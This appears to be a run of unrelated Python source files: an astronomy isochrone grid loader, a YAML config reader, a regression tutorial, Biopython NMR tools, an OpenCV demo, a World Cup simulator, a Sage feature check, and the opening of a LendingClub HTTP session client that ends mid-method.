    [Fe/H] values, and loads PARSEC ``.dat`` isochrone tables into DataFrames.
    """
    name = 'parsec'
    # NOTE: shadowed by the `common_columns` property below; kept as a class
    # attribute for backwards compatibility with code reading it off the class.
    common_columns = ('Zini', 'Age', 'Mini', 'Mass','logL', 'logTe', 'logg')

    phot_systems = ('opt', 'gaia', 'ir', 'sdss')
    phot_bands = dict(opt=['Umag', 'Bmag', 'Vmag',
                           'Rmag', 'Imag','Jmag', 'Hmag', 'Kmag'],
                      gaia=['Gmag', 'G_BPmag', 'G_RPmag'],
                      ir=['IRAC_3.6mag ', 'IRAC_4.5mag', 'IRAC_5.8mag', 'IRAC_8.0mag', 'MIPS_24mag', 'W1mag', 'W2mag', 'W3mag', 'W4mag'],
                      sdss=['umag', 'gmag', 'rmag', 'imag', 'zmag'])

    default_kwargs = {'version':'1.0'}
    datadir = os.path.join(ISOCHRONES, 'parsec')
    default_bands = ('G','BP','RP','J','H','K','W1','W2','W3','g','r','i','z')

    def __init__(self, *args, **kwargs):
        # Parse eagerly so an invalid version string fails fast at construction.
        version = kwargs.get('version', self.default_kwargs['version'])
        StrictVersion(str(version))
        super().__init__(*args, **kwargs)

    @classmethod
    def get_common_columns(cls, version=None, **kwargs):
        """Return the column names shared by every PARSEC grid version."""
        if version is None:
            version = cls.default_kwargs['version']
        # Validate the version string; columns are currently version-independent.
        StrictVersion(str(version))
        return ('Zini', 'Age', 'Mini', 'Mass','logL', 'logTe', 'logg')

    @property
    def version(self):
        """Grid version as a comparable StrictVersion."""
        return StrictVersion(str(self.kwargs['version']))

    @property
    def common_columns(self):
        return self.get_common_columns(self.version)

    def phot_tarball_url(self, phot):
        """Return the download URL for the *phot* system's tarball.

        Raises
        ------
        ValueError
            For an unknown photometric system (the original left ``url``
            unbound and raised UnboundLocalError instead).
        """
        urls = {
            'ir': 'https://www.dropbox.com/s/rlb5ifn2htbgn5l/ir.tar.gz?dl=1',
            'sdss': 'https://www.dropbox.com/s/6ep3g9ey8j6waxl/sdss.tar.gz?dl=1',
            'gaia': 'https://www.dropbox.com/s/120hxb4n88apaov/gaia.tar.gz?dl=1',
            'opt': 'https://www.dropbox.com/s/vdu58x4pfjbuhsz/opt.tar.gz?dl=1',
        }
        try:
            return urls[phot]
        except KeyError:
            raise ValueError('Unknown photometric system: {}'.format(phot))

    @classmethod
    def get_band(cls, b, **kwargs):
        """Defines what a "shortcut" band name refers to. Returns phot_system, band.
        """
        phot = None
        band = None
        # Default to SDSS for these
        if b in ['u','g','r','i','z']:
            phot = 'sdss'
            band = '{}mag'.format(b)
        elif b in ['U','B','V','R','I','J','H','K']:
            phot = 'opt'
            band = '{}mag'.format(b)
        elif b in ['W1','W2','W3','W4']:
            phot = 'ir'
            band = '{}mag'.format(b)
        elif b in ('G',):  # original had ('G'), which is a plain string
            phot = 'gaia'
            band = '{}mag'.format(b)
        elif b in ('BP','RP'):
            phot = 'gaia'
            band = 'G_{}mag'.format(b)
        if phot is None:
            # Fall back to exact band names as listed per system.
            for system, bands in cls.phot_bands.items():
                if b in bands:
                    phot = system
                    band = b
                    break
        if phot is None:
            raise ValueError('Parsec grids cannot resolve band {}!'.format(b))
        return phot, band

    @classmethod
    def phot_tarball_file(cls, phot, **kwargs):
        """Local path of the downloaded tarball for *phot*."""
        return os.path.join(cls.datadir, '{}.tar.gz'.format(phot))

    def get_filenames(self, phot):
        """Return all ``.dat`` isochrone files for *phot*, extracting if needed."""
        d = os.path.join(self.datadir, '{}'.format(phot))
        if not os.path.exists(d):
            # NOTE(review): extraction is attempted only when the tarball is
            # absent; presumably extract_phot_tarball downloads it first --
            # confirm against ModelGrid.
            if not os.path.exists(self.phot_tarball_file(phot)):
                self.extract_phot_tarball(phot)
        # Raw string avoids the invalid-escape DeprecationWarning on '\.'.
        return [os.path.join(d, f) for f in os.listdir(d) if re.search(r'\.dat$', f)]

    @classmethod
    def get_feh(cls, filename):
        """Parse [Fe/H] from a filename token like ``p010`` (+0.10) or ``m050`` (-0.50)."""
        m = re.search(r'([mp])([0-9]{3}).', filename)
        if m:
            sign = 1 if m.group(1) == 'p' else -1
            return float(m.group(2)) / 100. * sign
        else:
            raise ValueError('{} not a valid Parsec file? Cannot parse [Fe/H]'.format(filename))

    @classmethod
    def to_df(cls, filename):
        """Load one isochrone file into a DataFrame (adds feh; Age -> log10(Age))."""
        with open(filename, 'r', encoding='latin-1') as fin:
            # Scan for the commented header line that names the columns.
            while True:
                line = fin.readline()
                if not line:
                    # EOF without a header: the original looped forever here.
                    raise ValueError('No "# Zini" header line found in {}'.format(filename))
                if re.match('# Zini', line):
                    column_names = line[1:].split()
                    break
        feh = cls.get_feh(filename)
        # sep=r'\s+' replaces the deprecated pd.read_table/delim_whitespace.
        df = pd.read_csv(filename, comment='#', sep=r'\s+',
                         skip_blank_lines=True, names=column_names)
        df['feh'] = feh  # parsed once (the original called get_feh twice)
        df['Zini'] = df['feh']
        df['Age'] = np.log10(df['Age'])
        return df

    def df_all(self, phot, **kwargs):
        """All isochrones for *phot*, sorted and indexed by (feh, Age)."""
        df = super(ParsecModelGrid, self).df_all(phot)
        df = df.sort_values(by=['feh','Age','Mini'])
        df.index = [df.feh, df.Age]
        return df

    def hdf_filename(self, phot):
        """Path of the HDF5 cache file for *phot*."""
        return os.path.join(self.datadir, '{}.h5'.format(phot))
|
import os, yaml
from .exception import YamlErrorConfigFileParsing, NoConfigFileFound, YamlErrorConfigFileBadType
config_file_name = '.makaron.yml'
config_file_content = \
'''# {}
# more info at https://makaron.gitlab.io
setup.py: "__version__ = '[version]'"
'''.format(config_file_name)
def generate_config_file():
    """Write the default makaron configuration to ``.makaron.yml`` in the CWD."""
    with open(config_file_name, 'w') as fh:
        fh.write(config_file_content)
def read_config_file():
    """Load and validate the makaron YAML configuration.

    Returns the parsed configuration dict.

    Raises NoConfigFileFound when the file is missing,
    YamlErrorConfigFileParsing when the YAML is malformed, and
    YamlErrorConfigFileBadType when the document is not a mapping.
    """
    # Guard clause: bail out early when there is nothing to read.
    if not os.path.isfile(config_file_name):
        raise NoConfigFileFound()
    with open(config_file_name, 'r') as stream:
        raw = stream.read()
    try:
        parsed = yaml.safe_load(raw)
    except yaml.YAMLError as exc:
        raise YamlErrorConfigFileParsing(exc)
    if not isinstance(parsed, dict):
        raise YamlErrorConfigFileBadType(type(parsed))
    return parsed
|
# Simple linear regression on the Salary_Data.csv dataset.

# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd

# Importing the dataset
dataset = pd.read_csv('Salary_Data.csv')
X = dataset.iloc[:, :-1].values   # years of experience (feature matrix)
y = dataset.iloc[:, 1].values     # salary (target vector)

# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 1/3, random_state = 0)

# Feature Scaling (not needed here: LinearRegression handles unscaled inputs)
"""from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)"""

# Fitting Simple Linear Regression to the Training Set
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
regressor.fit(X_train, y_train)

# Predicting the Test set results
y_pred = regressor.predict(X_test)

# Visualising the Training set results (typo fixes in the chart labels)
plt.scatter(X_train, y_train, color='red')
plt.plot(X_train, regressor.predict(X_train), color='blue')
plt.title('Salary vs Experience (Training set)')
plt.xlabel('Years of experience')
plt.ylabel('Salary')
plt.show()
# Copyright 2004 by Bob Bussell. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""NOEtools: For predicting NOE coordinates from assignment data.
The input and output are modelled on nmrview peaklists.
This module is suitable for directly generating an nmrview
peaklist with predicted crosspeaks from the
input assignment peaklist.
"""
from . import xpktools
def predictNOE(peaklist, originNuc, detectedNuc, originResNum, toResNum):
    """Predict the i->j NOE position based on self peak (diagonal) assignments.

    Parameters
    ----------
    peaklist : xpktools.Peaklist
        List of peaks from which to derive predictions
    originNuc : str
        Name of originating nucleus.
    detectedNuc : str
        Name of detected nucleus.
    originResNum : int
        Index of originating residue.
    toResNum : int
        Index of detected residue.

    Returns
    -------
    returnLine : str
        The .xpk file entry for the predicted crosspeak, or an empty string
        when either residue is absent from the peaklist.

    Examples
    --------
    Using predictNOE(peaklist,"N15","H1",10,12)
    where peaklist is of the type xpktools.peaklist
    would generate a .xpk file entry for a crosspeak
    that originated on N15 of residue 10 and ended up
    as magnetization detected on the H1 nucleus of
    residue 12

    Notes
    =====
    The initial peaklist is assumed to be diagonal (self peaks only)
    and currently there is no checking done to insure that this
    assumption holds true.  Check your peaklist for errors and
    off diagonal peaks before attempting to use predictNOE.
    """
    returnLine = ""  # The modified line to be returned to the caller
    datamap = _data_map(peaklist.datalabels)

    # Column indices (+1 skips the leading peak-number column in data lines).
    originAssCol = datamap[originNuc + ".L"] + 1
    originPPMCol = datamap[originNuc + ".P"] + 1
    detectedPPMCol = datamap[detectedNuc + ".P"] + 1

    # Cache the residue dictionary once; the original rebuilt it per lookup.
    # (assumes residue_dict is a pure lookup -- TODO confirm in xpktools)
    residues = peaklist.residue_dict(detectedNuc)
    if str(toResNum) in residues and str(originResNum) in residues:
        detectedList = residues[str(toResNum)]
        originList = residues[str(originResNum)]

        # Start from the first detected entry and patch in the origin data.
        # The original wrapped these statements in a loop over detectedList
        # whose body never used the loop variable and recomputed identical
        # values each pass (including an unused detected-PPM average); the
        # loop has been removed.
        returnLine = detectedList[0]
        aveOriginPPM = _col_ave(originList, originPPMCol)
        originAss = originList[0].split()[originAssCol]

        returnLine = xpktools.replace_entry(returnLine, originAssCol + 1, originAss)
        returnLine = xpktools.replace_entry(returnLine, originPPMCol + 1, aveOriginPPM)
    return returnLine
def _data_map(labelline):
# Generate a map between datalabels and column number
# based on a labelline
i = 0 # A counter
datamap = {} # The data map dictionary
labelList = labelline.split() # Get the label line
# Get the column number for each label
for i in range(len(labelList)):
datamap[labelList[i]] = i
return datamap
def _col_ave(list, col):
# Compute average values from a particular column in a string list
total = 0.0
n = 0
for element in list:
total += float(element.split()[col])
n += 1
return total / n
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 3 16:02:44 2019
@author: gptshubham595
"""
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import cv2
import matplotlib.pyplot as plot
def main():
    """Load a sample image and display it twice: converted to RGB, then raw BGR."""
    # Common colour spaces for reference:
    #   HSV  - Hue, Saturation, Value
    #   GRAY - single-channel intensity
    #   CMY  - Cyan, Magenta, Yellow (the original comment misnamed these)
    #   RGB / BGR - the two channel orderings used below
    #print('cv2 version:',format(cv2.__version__))
    # Hard-coded Windows path to the sample image.
    imgpath="C:\\opencv learn machin\\misc\\4.1.01.tiff"
    # imread flag: 1 = keep colour (default), 0 = grayscale.
    # cv2.imread stores pixel data in B G R channel order.
    img=cv2.imread(imgpath,1)
    img1=cv2.imread(imgpath,1)
    # Convert the first copy from BGR to RGB so matplotlib shows true colours.
    img=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
    # plot.imshow interprets arrays as R G B.
    plot.imshow(img)
    plot.title('RGB')
    # Hide the axis tick labels.
    plot.xticks([])
    plot.yticks([])
    plot.show()
    # Second copy left in BGR: red and blue channels appear swapped.
    plot.imshow(img1)
    plot.title('BGR')
    plot.show()
if __name__ == "__main__":
    main()
|
"""
https://www.fifaindex.com/teams/?type=1
https://www.fifaindex.com/teams/fifa07_3/?league=78&type=1
https://www.fifaindex.com/teams/fifa06_2/?league=78&type=1
Attacks per game - average unknown
Number of attacks,
Goals per game
http://www.slate.com/articles/sports/sports_nut/2013/08/the_numbers_game_why_soccer_teams_score_fewer_goals_than_they_did_100_years.html
"""
import csv
import copy
import random
import math
from collections import OrderedDict
AVERAGE_GOALS_PER_GAME = 2.6
AVERAGE_SHOTS_PER_GAME = 20 # Per team, shots on target about 50%. Attack and midfield + some random boost
EXTRA_ATTACK_RATIO = 15 # For better team
class WorldCupper(object):
def __init__(self, filename='worldcupper.csv'):
self.groups = {} # Team groups in WC
with open(filename, mode='r', encoding='utf-8-sig') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
row['goals_for'] = 0
row['goals_against'] = 0
row['goals_diff'] = 0
row['games_won'] = 0
row['games_lost'] = 0
row['games_tied'] = 0
row['points'] = 0
row['name'] = row['name'].capitalize()
self.groups.setdefault(row['group'], []).append(row)
self.total_group_goals = 0
self.games = 0
self.total_knockout_goals = 0
    def run_group_stage(self):
        """Play every round-robin group fixture, then print the standings.

        Side effects: mutates each team dict's counters (goals_for, points,
        ...), increments self.games / self.total_group_goals, and replaces
        self.groups with an alphabetically ordered OrderedDict.
        """
        # Run group stage
        self.groups = OrderedDict(sorted(self.groups.items()))
        for group_name, group_teams in self.groups.items():
            # Round-robin: each pair within a group plays exactly once.
            for i, team1 in enumerate(group_teams):
                for team2 in group_teams[i+1:]:
                    team1_score, team2_score, total_goals, _ = self.run_match(team1, team2)
                    self.games += 1
                    self.total_group_goals += total_goals
                    # Accumulate per-team goal tallies.
                    team1['goals_for'] += team1_score
                    team2['goals_for'] += team2_score
                    team1['goals_against'] += team2_score
                    team2['goals_against'] += team1_score
                    team1['goals_diff'] += team1_score - team2_score
                    team2['goals_diff'] += team2_score - team1_score
                    # Standard scoring: 3 points for a win, 1 each for a draw.
                    if team1_score > team2_score:
                        team1['games_won'] += 1
                        team1['points'] += 3
                        team2['games_lost'] += 1
                    elif team1_score == team2_score:
                        team1['games_tied'] += 1
                        team2['games_tied'] += 1
                        team1['points'] += 1
                        team2['points'] += 1
                    elif team1_score < team2_score:
                        team2['games_won'] += 1
                        team1['games_lost'] += 1
                        team2['points'] += 3
                    print(team1['name'], ' ', team1_score, ' vs ', team2['name'], ' ',
                          team2_score)
        # Summary of groups
        print('total goals in ', self.games, ' games ', self.total_group_goals)
        print('goals per game ', self.total_group_goals/self.games)
        for group_name, group_teams in self.groups.items():
            print('Group {}'.format(group_name))
            print('team, points, games won, games lost, games tied, goals for, goals against, goal diff')
            # Standings: points first, goal difference as the tiebreaker.
            # NOTE(review): the sorted list is local only -- self.groups keeps
            # insertion (CSV) order, which run_knockout_stage later indexes
            # for seeding. Confirm that is intended.
            group_teams = sorted(group_teams, key=lambda k: (k['points'], k['goals_diff']), reverse=True)
            for i, team in enumerate(group_teams):
                print(team['name'], team['points'], team['games_won'], team['games_lost'], team['games_tied'],
                      team['goals_for'], team['goals_against'], team['goals_diff'])
            print('')
def run_round(self, current_round_matches):
current_round_matches = copy.deepcopy(current_round_matches)
next_round_matches = []
next_match = []
round_total_goals = 0
for i, match_teams in enumerate(current_round_matches):
team1_score, team2_score, total_goals, winning_team = self.run_match(match_teams[0], match_teams[1],
do_penalties=True)
# Save scores in original dict
match_teams[0]['score'] = team1_score
match_teams[1]['score'] = team2_score
round_total_goals += total_goals
# print(match_teams[0]['name'], match_teams[0]['score'], match_teams[1]['name'], match_teams[1]['score'])
# winning_team['score'] = None
next_match.append(winning_team)
if i % 2:
next_round_matches.append(next_match)
next_match = []
# Single winner edge case for round of 2 teams (final)
final_winner = None
if not next_round_matches:
final_winner = next_match[0]
return next_round_matches, current_round_matches, final_winner, round_total_goals
    def run_knockout_stage(self):
        """Play the knockout bracket seeded from the group lists.

        NOTE(review): groups[x][0] / groups[x][1] index self.groups, which
        run_group_stage leaves in CSV insertion order (its standings sort is
        local) -- confirm the seeding is intended to use standings.
        """
        groups = self.groups
        # Round-of-16 pairings: nominal group winners vs runners-up, cross-bracket.
        final_16_matches = [
            [groups['a'][0], groups['b'][1]], [groups['c'][0], groups['d'][1]],
            [groups['e'][0], groups['f'][1]], [groups['g'][0], groups['h'][1]],
            [groups['b'][0], groups['a'][1]], [groups['d'][0], groups['c'][1]],
            [groups['f'][0], groups['e'][1]], [groups['h'][0], groups['g'][1]]
        ]
        # Round of 16 -> produces the quarter-final pairings.
        quarter_final_matches, final_16_matches, _, total_goals = self.run_round(final_16_matches)
        self.total_knockout_goals += total_goals
        # Quarter finals -> produces the semi-final pairings.
        # (The original comments had the quarter/semi labels swapped.)
        semi_final_matches, quarter_final_matches, _, total_goals = self.run_round(quarter_final_matches)
        self.total_knockout_goals += total_goals
        # Semi finals -> produces the final pairing.
        final_match, semi_final_matches, _, total_goals = self.run_round(semi_final_matches)
        self.total_knockout_goals += total_goals
        # Final -> yields the tournament winner.
        _, final_match, winner, total_goals = self.run_round(final_match)
        self.total_knockout_goals += total_goals
        # Render the completed bracket.
        self.draw_knockout_table(final_16_matches, quarter_final_matches, semi_final_matches, final_match, winner)
def attack(self, team_attack, team_overall, number_of_attacks, other_team_defense):
"""
Get team score on attack
:param team_attack:
:param team_overall:
:param number_of_attacks:
:param other_team_defense:
:return:
"""
team_score = 0
for _ in range(number_of_attacks):
# attack = how many are on target, chance of scoring
chance_of_scoring = random.random() * team_attack * team_overall
# defense = how many go in
chance_of_defense = random.random() * other_team_defense * team_overall
# print(chance_of_scoring, chance_of_defense, 'attack ', team_attack, 'other team def', other_team_defense)
if chance_of_scoring > chance_of_defense:
team_score += 1
return team_score
def get_total_goals(self, team1_attack, team2_attack, team1_defense, team2_defense):
total_goals = max(AVERAGE_GOALS_PER_GAME * random.uniform(0, 3) + (
(team1_attack + team2_attack - team1_defense - team2_defense) * 10) - 2, 0)
return total_goals
def normalize_goals(self, team1_score, team2_score, team1_attack, team2_attack, team1_defense, team2_defense,
total_goals=None):
"""
Normalize match goals
:param team1_score:
:param team2_score:
:param team1_attack:
:param team2_attack:
:param team1_defense:
:param team2_defense:
:param total_goals:
:return:
"""
if not total_goals:
# CForce total_goals to be > 0 if the diff b/w team1_score & team2_score is high
total_goals = self.get_total_goals(team1_attack, team2_attack, team1_defense, team2_defense)
if not total_goals and math.fabs(team1_score - team2_score) > 4:
total_goals = self.get_total_goals(team1_attack, team2_attack, team1_defense, team2_defense)
total_goals = int(round(total_goals, 0))
team1_new_score = team2_new_score = 0
if team1_score:
team1_new_score = int(round(team1_score / (team1_score + team2_score) * total_goals, 0))
if team2_score:
team2_new_score = int(round(team2_score / (team1_score + team2_score) * total_goals, 0))
return team1_new_score, team2_new_score, total_goals
def run_match(self, team1, team2, do_penalties=False):
"""
Run a match simulation
:param team1:
:param team2:
:param do_penalties:
:return:
"""
# Lower is better. FIFA rating is not as significant.
team1_overall_rating = float(float(team1['fifa_rating']) / 2.0) + float(team1['elo_rating']) + \
float(team1['goalimpact_rating']) + (5 - float(team1['ea_fifa_18_rating']))
team2_overall_rating = float(float(team1['fifa_rating']) / 2.0) + float(team2['elo_rating']) + \
float(team2['goalimpact_rating']) + (5 - float(team2['ea_fifa_18_rating']))
# print('overall', team1_overall_rating, team2_overall_rating)
team1_relative_rating = team1_overall_rating / max(team1_overall_rating, team2_overall_rating)
team2_relative_rating = team2_overall_rating / max(team1_overall_rating, team2_overall_rating)
team1_relative_rating = 1.0 - team1_relative_rating
team2_relative_rating = 1.0 - team2_relative_rating
# print('relative!!', team1_relative_rating, team2_relative_rating)
# TODO: Man not need random factor
# team1_random_factor = float(team1['overall']) / 100.0 * random.random() + \
# (float(team1['boost']) / 100.0)
# team2_random_factor = float(team2['overall']) / 100.0 * random.random() + \
# (float(team2['boost']) / 100.0)
# print('rand factor', team1_random_factor, team2_random_factor)
# midfield = how many shots you get (attacks)
team1_attack = float(team1['att']) / 100.0
team2_attack = float(team2['att']) / 100.0
team1_midfield = float(team1['mid']) / 100.0
team2_midfield = float(team2['mid']) / 100.0
team1_defense = float(team1['def']) / 100.0
team2_defense = float(team2['def']) / 100.0
team1_overall = float(team1['overall']) / 100.0
team2_overall = float(team2['overall']) / 100.0
# How much better is team 1 vs team 2?
attack_diff_factor = math.fabs(team2_attack - team1_attack) * 2
team1_attack_boost_min = 0.5
team1_attack_boost_max = 1.0
team2_attack_boost_min = 0.5
team2_attack_boost_max = 1.0
if team1_attack > team2_attack:
team1_attack_boost_max = team1_attack_boost_max + attack_diff_factor
team1_attack_boost_min = team1_attack_boost_min - attack_diff_factor
elif team1_attack < team2_attack:
team2_attack_boost_max = team2_attack_boost_max + attack_diff_factor
team2_attack_boost_min = team2_attack_boost_min - attack_diff_factor
team1_number_of_attacks = random.uniform((team1_attack + team1_midfield) / 2.0,
1.0) * AVERAGE_SHOTS_PER_GAME * random.uniform(
team1_attack_boost_min, team1_attack_boost_max)
team2_number_of_attacks = random.uniform((team2_attack + team2_midfield) / 2.0,
1.0) * AVERAGE_SHOTS_PER_GAME * random.uniform(
team2_attack_boost_min, team2_attack_boost_max)
# team2_number_of_attacks = float(team1['att']) / 100.0 * float(team2['mid']) / 100.0 * \
# random.uniform(0.25, 1.0) * AVERAGE_SHOTS_PER_GAME
team1_number_of_attacks = int(round(team1_number_of_attacks, 0))
team2_number_of_attacks = int(round(team2_number_of_attacks, 0))
# print('no of shots/attacks', round(team1_number_of_attacks, 1), team2_number_of_attacks)
# print('attack for ', team1['name'])
team1_score = self.attack(team1_attack, team1_overall, team1_number_of_attacks, team2_defense)
# print('attack for ', team2['name'])
team2_score = self.attack(team2_attack, team2_overall, team2_number_of_attacks, team1_defense)
# print(team1_score, team2_score)
# Additional goals, based on relative rating
# print('relative is', team1['name'], team1_relative_rating, team2['name'], team2_relative_rating)
if team1_relative_rating > team2_relative_rating:
# Team 1 better, lower is better
# team1_score = team1_score + (team1_relative_rating * random.random() * 100)
team1_extra_attacks = int(round(team1_relative_rating * random.random() * EXTRA_ATTACK_RATIO, 0))
# print('team1 better', team1['name'], team1_extra_attacks)
team1_score += self.attack(team1_attack, team1_overall, team1_extra_attacks, team2_defense)
elif team1_relative_rating < team2_relative_rating:
# Team 2 better, lower is better
# team2_score = team2_score + (team2_relative_rating * random.random() * 100)
team2_extra_attacks = int(round(team2_relative_rating * random.random() * EXTRA_ATTACK_RATIO, 0))
# print('team2 better', team2['name'], team2_extra_attacks)
team2_score += self.attack(team2_attack, team2_overall, team2_extra_attacks, team1_defense)
team1_score, team2_score, total_goals = self.normalize_goals(team1_score, team2_score, team1_attack,
team2_attack, team1_defense, team2_defense)
# Penalties if applicable
if team1_score == team2_score and do_penalties:
team1_penalties = 0
team2_penalties = 0
penalties_taken = 0
while team1_penalties == team2_penalties or penalties_taken < 5:
team1_penalties += self.attack(team1_attack, team1_overall, 1, team2_defense)
team2_penalties += self.attack(team2_attack, team2_overall, 1, team1_defense)
penalties_taken += 1
if team1_penalties > team2_penalties:
team1_score += 1
else:
team2_score += 1
winning_team = None
if team1_score > team2_score:
winning_team = team1
elif team2_score > team1_score:
winning_team = team2
# TODO: Return penalties scored if applicable
return team1_score, team2_score, total_goals, winning_team
    def draw_knockout_table(self, final_16_matches, quarter_final_matches, semi_final_matches, final_match, winner):
        """
        Print an ASCII bracket of the whole knockout stage.

        Builds 31 labels -- "name score" for both teams of each of the
        8 + 4 + 2 + 1 matches (indices 0-29), plus the winner's name
        (index 30) -- and substitutes them into a fixed bracket template.

        :param final_16_matches: list of 8 (team, team) match pairs
        :param quarter_final_matches: list of 4 match pairs
        :param semi_final_matches: list of 2 match pairs
        :param final_match: list with the single final match pair
        :param winner: dict of the tournament winner; 'name' is printed
        """
        args = []
        # Each match contributes two "name score" entries, in bracket order.
        for match in final_16_matches + quarter_final_matches + semi_final_matches + final_match:
            args.append(match[0]['name'] + ' ' + str(match[0]['score']))
            args.append(match[1]['name'] + ' ' + str(match[1]['score']))
        args.append(winner['name'])
        # Template placeholders: {0}-{15} round of 16, {16}-{23} quarters,
        # {24}-{27} semis, {28}-{29} final, {30} champion.
        table = ("\n"
                 "Left:\n"
                 "{0}\n"
                 "{1}\n"
                 " {16}\n"
                 " {17}\n"
                 "{2}\n"
                 " {24}\n"
                 "{3}\n"
                 " {28}\n"
                 "{4}\n"
                 "{5}\n"
                 " {25}\n"
                 " {18}\n"
                 " {19}\n"
                 "{6}\n"
                 "{7}\n"
                 " {30}\n"
                 "Right:\n"
                 "{8}\n"
                 "{9}\n"
                 " {20}\n"
                 " {21}\n"
                 "{10}\n"
                 " {26}\n"
                 "{11}\n"
                 " {29}\n"
                 "{12}\n"
                 "{13}\n"
                 " {27}\n"
                 " {22}\n"
                 " {23}\n"
                 "{14}\n"
                 "{15}\n").format(*args)
        print(table)
if __name__ == "__main__":
    # Simulate a full tournament: group stage first, then the knockout rounds.
    wc = WorldCupper()
    wc.run_group_stage()
    wc.run_knockout_stage()
|
r"""
Features for testing the presence of Singular
"""
from . import Executable
from sage.env import SINGULAR_BIN
class Singular(Executable):
    r"""
    A :class:`~sage.features.Feature` describing the presence of the Singular executable.

    EXAMPLES::

        sage: from sage.features.singular import Singular
        sage: Singular().is_present()
        FeatureTestResult('singular', True)
    """
    def __init__(self):
        r"""
        TESTS::

            sage: from sage.features.singular import Singular
            sage: isinstance(Singular(), Singular)
            True
        """
        # Use the idiomatic super() call rather than naming the base class.
        super().__init__("singular", SINGULAR_BIN,
                         spkg='singular')
|
#!/usr/bin/env python
"""
Manage the LendingClub user session and all raw HTTP calls to the LendingClub site.
This will almost always be accessed through the API calls in
:class:`lendingclub.LendingClub` instead of directly.
"""
"""
The MIT License (MIT)
Copyright (c) 2013 Jeremy Gillick
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import re
import requests
import getpass
import time as time
from bs4 import BeautifulSoup
from requests.exceptions import *
class Session:
    """
    Holds the authenticated LendingClub.com browser session and performs
    all raw HTTP calls, re-authenticating automatically when the session
    has been idle past :attr:`session_timeout`.
    """

    # Account email used for (re-)authentication.
    email = None
    # Account password (kept name-mangled; never logged).
    __pass = None
    # Optional logging.Logger for debug output.
    __logger = None
    # The last requests.Response received, for debugging.
    last_response = None

    # Minutes until the session expires. The session will attempt to
    # reauth before the next HTTP call after timeout.
    session_timeout = 10

    # The root URL that all paths are appended to.
    base_url = 'https://www.lendingclub.com/'

    # The timestamp of the last HTTP request.
    last_request_time = 0

    # The underlying requests.Session, created in authenticate().
    __session = None

    def __init__(self, email=None, password=None, logger=None):
        self.email = email
        self.__pass = password
        self.__logger = logger

    def __log(self, message):
        """
        Log a debugging message
        """
        if self.__logger:
            self.__logger.debug(message)

    def __continue_session(self):
        """
        Check if the time since the last HTTP request is under the
        session timeout limit. If it's been too long since the last request
        attempt to authenticate again.
        """
        now = time.time()
        diff = abs(now - self.last_request_time)
        timeout_sec = self.session_timeout * 60  # convert minutes to seconds
        if diff >= timeout_sec:
            self.__log('Session timed out, attempting to authenticate')
            self.authenticate()

    def set_logger(self, logger):
        """
        Have the Session class send debug logging to your python logging logger.
        Set to None stop the logging.

        Parameters
        ----------
        logger : `Logger <http://docs.python.org/2/library/logging.html>`_
            The logger to send debug output to.
        """
        self.__logger = logger

    def build_url(self, path):
        """
        Build a LendingClub URL from a URL path (without the domain).

        Parameters
        ----------
        path : string
            The path part of the URL after the domain. i.e. https://www.lendingclub.com/<path>
        """
        url = '{0}{1}'.format(self.base_url, path)
        url = re.sub(r'([^:])//', r'\1/', url)  # Remove double slashes (but keep the one after "https:")
        return url

    def authenticate(self, email=None, password=None):
        """
        Authenticate with LendingClub and preserve the user session for future requests.
        This will raise an exception if the login appears to have failed, otherwise it returns True.

        Since Lending Club doesn't seem to have a login API, the code has to try to decide if the login
        worked or not by looking at the URL redirect and parsing the returned HTML for errors.

        Parameters
        ----------
        email : string
            The email of a user on Lending Club
        password : string
            The user's password, for authentication.

        Returns
        -------
        boolean
            True on success or throws an exception on failure.

        Raises
        ------
        session.AuthenticationError
            If authentication failed
        session.NetworkError
            If a network error occurred
        """
        # Get email and password
        if email is None:
            email = self.email
        else:
            self.email = email
        if password is None:
            password = self.__pass
        else:
            self.__pass = password

        # Fall back to prompting the user interactively.
        if email is None:
            # BUG FIX: was raw_input(), which is a NameError on Python 3.
            email = input('Email:')
            self.email = email
        if password is None:
            password = getpass.getpass()
            self.__pass = password

        self.__log('Attempting to authenticate: {0}'.format(self.email))

        # Start session
        self.__session = requests.Session()
        self.__session.headers = {
            'Referer': 'https://www.lendingclub.com/',
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31'
        }

        # Set last request time to now
        self.last_request_time = time.time()

        # Send login request to LC
        payload = {
            'login_email': email,
            'login_password': password
        }
        response = self.post('/account/login.action', data=payload, redirects=False)

        # Get URL redirect URL and save the last part of the path as the endpoint
        response_url = response.url
        if response.status_code == 302:
            response_url = response.headers['location']
        endpoint = response_url.split('/')[-1]

        # Debugging
        self.__log('Status code: {0}'.format(response.status_code))
        self.__log('Redirected to: {0}'.format(response_url))
        self.__log('Cookies: {0}'.format(str(response.cookies.keys())))

        # Show query and data that the server received
        if 'x-echo-query' in response.headers:
